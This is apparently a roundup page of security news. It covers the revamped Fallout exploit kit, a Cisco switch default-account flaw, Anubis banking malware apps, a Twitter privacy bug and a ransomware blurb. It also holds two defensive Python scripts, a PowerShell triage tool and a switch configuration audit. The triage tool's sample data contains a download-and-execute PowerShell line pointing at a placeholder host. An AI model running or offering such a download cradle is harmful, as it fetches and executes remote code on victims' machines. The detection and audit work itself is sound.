A new version of the Fallout exploit kit (EK) has emerged, featuring new exploits and fresh payloads, including the GandCrab ransomware. The development shows that EKs have a lot of life left in them yet, researchers say.

The Fallout EK generally finds its victims by way of malvertising campaigns, especially those that take advantage of traffic to adult websites, according to an analysis from Jérôme Segura. It has been relatively quiet so far this year, but the researcher found that since Tuesday, Fallout EK activity has been picking up. It would appear that its operators used the post-holiday sabbatical to retool.

The revised Fallout EK sports several notable new features: HTTPS support, a new landing-page format, the use of PowerShell to run its payloads and, most notably, an exploit for the most recent Flash Player vulnerability, CVE-2018-15982. The vulnerability, which Adobe patched on Dec. 5, is a use-after-free flaw enabling arbitrary code execution in Flash. Researchers with Gigamon Applied Threat Research said that prior to the patch it was being exploited via a Microsoft Office document dubbed “22.docx.”

“The vulnerability allows for a maliciously crafted Flash object to execute code on a victim’s computer, which enables an attacker to gain command line access to the system,” researchers with Gigamon said at the time. They added, “Although the death of Flash has been widely reported thanks to industry efforts to deprecate and remove Flash from web browsers, vectors such as Microsoft Office remain able to load and execute Flash content.”

Another notable aspect of the new and improved Fallout EK is that it now delivers payloads via PowerShell rather than through iexplore.exe. “The Base64 encoded Powershell command calls out the payload URL and loads it in its own way,” explained Segura in a posting on Wednesday. “This technique is most likely an attempt at evasion, as traditionally we’d expect the Internet Explorer process to drop the payload.”

The resurgence of the Fallout EK (and the fact that the RIG EK saw increased activity in the first half of January, according to Malwarebytes) shows that this threat arena is alive and well, even though its traditional attack vectors are showing signs of being phased out. “EK activity slowed down in late 2016 and remained really stagnated in 2017, especially if we consider the lack of developments in this space,” Segura told Threatpost. “However, 2018 brought up newer exploits in particular for Internet Explorer and the Flash Player. There is no doubt that this gave exploit kits an extension on their lifespan and this is why we see different actors still leveraging this infection vector.”

He added that Fallout’s revamping also tells us that exploit kit developers are still monitoring the scene for new exploits and techniques. Segura said: “Even though the market share for IE and Flash continues to drop, there are many countries still running older systems where the default browser is Internet Explorer. Therefore, threat actors will take advantage.”

Also notable is that Fallout is ahead of the game compared to older EKs like RIG, which may spur increased EK activity going forward. “If we compare the two exploit kits simply based on their features, Fallout is definitely superior,” Segura told Threatpost. “For malware distributors, using a more powerful toolkit will result in a greater number of successful infections. This, in turn, has a direct impact on the popularity of an exploit kit in distribution campaigns.” He added, “Fallout EK is a relatively new exploit kit but within its short tenure has constantly made improvements. This matters because it can lead by example and drive innovation with its competitors.”
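The evasion Segura describes leaves a detectable trace: a browser process spawning PowerShell with a Base64-encoded command that, once decoded, contains the payload URL. The following triage helper is an added example written for this page, not code from Malwarebytes or from the Fallout EK itself. It decodes the `-EncodedCommand` argument (UTF-16LE text, Base64-encoded, as PowerShell expects), pulls out any URL, and raises the verdict when the parent is a browser. The process events, the `example.invalid` URL and the download one-liner are constructed sample data; the PowerShell switch prefixes it accepts (`-e`, `-ec`, `-enc`, `-encodedcommand`) are the standard abbreviations.

```python
import base64
import re

# Parents we would not expect to launch an encoded PowerShell downloader.
BROWSERS = {"iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe"}

# -EncodedCommand and its accepted abbreviations, followed by a Base64 blob.
ENC_SWITCH = re.compile(
    r"(?i)(?:^|\s)[-/]e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})"
)
URL_RE = re.compile(r"(?i)\bhttps?://[^\s'\"<>)]+")


def decode_encoded_command(cmdline):
    """Return the decoded script carried by -EncodedCommand, or None."""
    m = ENC_SWITCH.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")  # PowerShell encodes the script as UTF-16LE
    except (ValueError, UnicodeDecodeError):
        return None


def triage_event(event):
    """Classify one process-creation event.

    event is a dict with 'parent', 'image' and 'cmdline' (a constructed
    shape for this example; map your EDR/Sysmon fields onto it).
    """
    image = event["image"].lower()
    if image not in ("powershell.exe", "pwsh.exe"):
        return {"verdict": "ignore", "decoded": None, "urls": []}

    decoded = decode_encoded_command(event["cmdline"])
    urls = URL_RE.findall(decoded) if decoded else []
    browser_parent = event["parent"].lower() in BROWSERS

    if browser_parent and urls:
        verdict = "alert: browser spawned encoded PowerShell downloader"
    elif browser_parent or urls:
        verdict = "review"
    else:
        verdict = "ignore"
    return {"verdict": verdict, "decoded": decoded, "urls": urls}


def encode_for_powershell(script):
    """Build the -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (not captured data). The URL is an RFC 2606
# reserved name and resolves nowhere.
SAMPLE_SCRIPT = (
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/upd.php')"
)
SAMPLE_EVENTS = [
    {"parent": "iexplore.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_for_powershell(SAMPLE_SCRIPT)},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    {"parent": "iexplore.exe", "image": "notepad.exe", "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        result = triage_event(ev)
        print(ev["parent"], "->", ev["image"], "|", result["verdict"], result["urls"])
```

Run it against real telemetry by feeding each process-creation record into `triage_event`; the first sample is the shape described in the article (browser parent, encoded command, remote URL) and is the only one that alerts.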


Exposed personal data was the big trend this week, dominated by Troy Hunt’s discovery of a database of breached emails totaling 773 million unique addresses in a popular cloud service. Millions of sensitive files on a storage server belonging to the Oklahoma Department of Securities were also left exposed for a week, and an improperly secured database owned by VOIPO exposed millions of customer call logs, SMS message logs and credentials in plain text. Threatpost’s Tom Spring and Lindsey O’Donnell break down the biggest headlines from this week. Interested in learning more about data breach trends? Join the free Threatpost webinar on Wednesday, Jan. 23 at 2 p.m. EST, as editor Tom Spring examines the data breach epidemic with the help of noted breach hunter and cybersecurity expert Chris Vickery. Vickery shares how companies can identify their own insecure data, remediate against a data breach and offers tips on protecting data against future attacks.


A critical and unpatched vulnerability in the widely deployed Cisco Small Business Switch software leaves the door open to remote, unauthenticated attackers gaining full administrative control over the device – and therefore the network. Cisco Small Business Switches were developed for small office and home office (SOHO) environments, to manage and control small local area networks with no more than a handful of workstations. They come in cloud-based, managed and unmanaged “flavors,” and are an affordable (under $300) solution for resource-strapped small businesses. The vulnerability (CVE-2018-15439), which has a critical base CVSS severity rating of 9.8, exists because the default configuration on the devices includes a default, privileged user account that is used for the initial login and cannot be removed from the system. An administrator may disable this account by configuring other user accounts with access privilege set to level 15. However, if all user-configured privilege level 15 accounts are removed from the device configuration, it re-enables the default privileged user account without notifying administrators of the system. “Under these circumstances, an attacker can use this account to log in to an affected device and execute commands with full admin rights,” Cisco explained in its advisory on Wednesday. “[It] could allow an unauthenticated, remote attacker to bypass the user-authentication mechanism of an affected device.” Since the switches are used to manage a LAN, a successful exploit means that a remote attacker would gain access to network security functions such as firewalls, as well as the management interface for administering voice, data and wireless connectivity for network devices. There’s no patch to address the vulnerability, though one is expected at some (as yet unannounced) point in the future, Cisco said. 
There is, however, a simple workaround: add at least one user account with access privilege set to level 15 in the device configuration. Users can “configure an account by using admin as user ID, setting the access privilege to level 15, and defining the password by replacing with a complex password chosen by the user,” according to the advisory. “By adding this user account, the default privileged account will be disabled.” Note that the workaround only holds while at least one such account exists; deleting the last level-15 account silently brings the default account back. The flaw affects Cisco Small Business 200 Series Smart Switches, 250 Series Smart Switches, 300 Series Managed Switches, 350 Series Managed Switches, Cisco 350X Series Stackable Managed Switches, 500 Series Stackable Managed Switches and 550X Series Stackable Managed Switches. The Cisco 220 Series and 200E Series Smart Switches aren’t affected, and neither are devices running Cisco IOS Software, Cisco IOS XE Software or Cisco NX-OS Software, according to the networking giant. Earlier in January Cisco issued 18 fixes as part of its monthly update, including two serious vulnerabilities for another small-business stalwart, its security appliance tool. Two bugs, one critical and one high-severity, could ultimately lead to a permanent denial of service (DoS) on impacted devices and can be exploited by an attacker who simply sends an email.
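Because the workaround depends on a level-15 account existing at all times, the useful check is a configuration audit that flags any affected switch whose saved configuration has no such account. The script below is an added example for this page, not Cisco's code or anything from the advisory. It assumes the switch configuration uses `username <name> ... privilege <n>` lines (the `privilege` keyword may appear anywhere on the line) and that an account with no explicit `privilege` keyword defaults to level 1; both are assumptions about the Small Business switch CLI, and the two configurations are constructed samples.

```python
import re

# Assumption: user accounts appear as "username <name> ..." lines and the
# privilege level, when set, appears on the same line as "privilege <n>".
USER_LINE = re.compile(r"^\s*username\s+(\S+)\b(.*)$", re.IGNORECASE)
PRIV_KW = re.compile(r"\bprivilege\s+(\d{1,2})\b", re.IGNORECASE)
DEFAULT_PRIVILEGE = 1  # assumption: accounts without the keyword are level 1


def parse_users(config_text):
    """Map each configured username to its privilege level."""
    users = {}
    for line in config_text.splitlines():
        m = USER_LINE.match(line)
        if not m:
            continue
        name, rest = m.group(1), m.group(2)
        p = PRIV_KW.search(rest)
        users[name] = int(p.group(1)) if p else DEFAULT_PRIVILEGE
    return users


def audit(config_text):
    """Return the level-15 accounts and whether the default account would be live.

    The advisory's condition: with zero user-configured level-15 accounts,
    the built-in privileged account is re-enabled without notice.
    """
    users = parse_users(config_text)
    level15 = sorted(n for n, lvl in users.items() if lvl == 15)
    return {
        "users": users,
        "level15": level15,
        "default_account_active": not level15,
    }


# Constructed sample configurations (not taken from a real device).
SAFE_CONFIG = """\
hostname sw-office-1
username admin password encrypted 0123456789abcdef privilege 15
username helpdesk password encrypted fedcba9876543210 privilege 7
"""

RISKY_CONFIG = """\
hostname sw-office-2
username helpdesk password encrypted fedcba9876543210 privilege 7
username guest password encrypted 00000000deadbeef
"""

if __name__ == "__main__":
    for label, cfg in (("safe", SAFE_CONFIG), ("risky", RISKY_CONFIG)):
        r = audit(cfg)
        state = "DEFAULT ACCOUNT ACTIVE" if r["default_account_active"] else "ok"
        print(f"{label}: level-15 accounts={r['level15']} -> {state}")
```

Pull the running configuration from each affected model, run `audit` over it, and treat `default_account_active` as a finding; re-run the audit after any account cleanup, since that is exactly when the condition is introduced.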


Despite Google's many efforts to keep malware out of its Play Store, shady apps have once again managed to fool its anti-malware protections and get onto the service to infect Android users. Two such Android apps were recently spotted on the Google Play Store by security researchers with the Trend Micro malware research team, infecting thousands of Android users who had already downloaded them with banking malware.

The apps in question masquerade as a currency exchange app called Currency Converter and a battery saver app called BatterySaverMobi, and use the motion-sensor inputs of infected Android devices to profile them before installing a dangerous banking Trojan called Anubis. The malicious apps, padded with a large number of fake five-star reviews, use this trick instead of traditional evasion techniques to avoid detection when researchers analyze apps in emulators, which are less likely to produce sensor data.

“As a user moves, their device usually generates some amount of motion sensor data. The malware developer is assuming that the sandbox for scanning malware is an emulator with no motion sensors, and as such will not create that type of data,” the researchers explain in a blog post published Thursday. “If that is the case, the developer can determine if the app is running in a sandbox environment by simply checking for sensor data.”

Once installed, the malicious app uses the infected device's motion sensor to detect whether the device is moving. If the device is still, the malicious code does not run. As soon as it detects sensor data, the app runs the malicious code and tries to trick the victim into downloading and installing the Anubis payload APK as a bogus system update, masquerading as a “stable version of Android.”

Not Just Motion Detection: There's More

If the user approves the fake system update, the built-in malware dropper uses requests and responses over legitimate services, including Twitter and Telegram, to locate its command and control (C&C) server and download the Anubis banking Trojan onto the infected device. “One of the ways the app developers hide the malicious server is by encoding it in Telegram and Twitter web page requests. The bank malware dropper will request Telegram or Twitter after it trusts the running device,” the researchers explain. “Then, it registers with the C&C server and checks for commands with an HTTP POST request. If the server responds to the app with an APK command and attaches the download URL, then the Anubis payload will be dropped in the background.”

Once the device is compromised, the Anubis banking Trojan obtains users' banking account credentials either with a built-in keylogger or by taking screenshots of the screen when they enter credentials into a banking app. Most banking Trojans instead launch a fake overlay screen on top of the bank's login page to steal credentials. According to the Trend Micro researchers, the latest version of Anubis has been distributed to 93 different countries and targets users of at least 377 financial apps to extract bank account details. The Trojan can also access contact lists and location, send spam messages to contacts, call numbers from the device, record audio and alter external storage. Google has since removed the two malicious apps from its Play Store.

Although it is a never-ending concern, the best way to protect yourself from such malware is to stay vigilant when downloading applications, even from Google's official Play Store. Most importantly, be careful which apps you grant device administrator rights to, as that is a powerful permission that can hand over full control of your device.


Twitter has admitted that the social network accidentally revealed some Android users' protected tweets to the public for more than four years, the kind of privacy blunder you would typically expect from Facebook.

When you sign up for Twitter, all your Tweets are public by default, allowing anyone to view and interact with them. Twitter also gives you control of your information, allowing you to keep your Tweets protected. Enabling the “Protect your Tweets” setting makes your tweets private, and you receive a request whenever someone new wants to follow you, which you can approve or deny. It is similar to private Facebook updates that limit your posts to your friends only.

In a post on its Help Center on Thursday, Twitter disclosed a privacy bug, dating back to November 3, 2014, that could cause the Twitter for Android app to disable the “Protect your Tweets” setting without the user's knowledge, making their private tweets visible to the public. The bug was only triggered for Android users who changed certain account settings, such as the email address or phone number associated with the account, using the Android app between November 3, 2014, and January 14, 2019.

“We recognize and appreciate the trust you place in us and are committed to earning that trust every day,” Twitter said in its statement. “We're very sorry this happened, and we're conducting a full review to help prevent this from happening again.” On January 14, 2019, Twitter rolled out an update to the Android application to fix the bug. Although Twitter did not specify how many Android users were affected, four years is a long time, and it is likely that most users changed their account settings at least once in that period. Twitter said it has reached out to the users it knows were affected by the privacy bug.

But since Twitter “can't confirm every account that may have been impacted,” if you use the Twitter for Android app and your tweets are supposed to be protected, head to the “Privacy and Safety” settings of the app and double-check that “Protect your Tweets” is still enabled. Desktop and iOS users can breathe a sigh of relief, as they were not affected by the bug.

The revelation comes while the social network is already under European Union investigation for violating the General Data Protection Regulation (GDPR). The law gives European citizens the right to request their personal data from companies, and when Twitter turned down a researcher's request for data related to its short URL service, the Irish Data Protection Commission (DPC) opened an investigation. The DPC is also aware of the latest privacy bug in the Twitter for Android app, and according to Bloomberg, the commission is looking into the matter.


Microsoft is offering rewards of up to $20,000 for flaws in its Azure DevOps online services and the latest release of the Azure DevOps server.


By Uzair Amir. Ransomware is a reality, and threat actors are using it frequently these days to make easy money. According to new findings from MalwareHunterTeam, there is in-development ransomware that can encrypt your files and also steal credit card information and PayPal credentials through a phishing page linked from its ransom note. The ransomware is not extraordinary in its […] (Original post on HackRead.com: New ransomware steals PayPal data with phishing link in ransom note.)
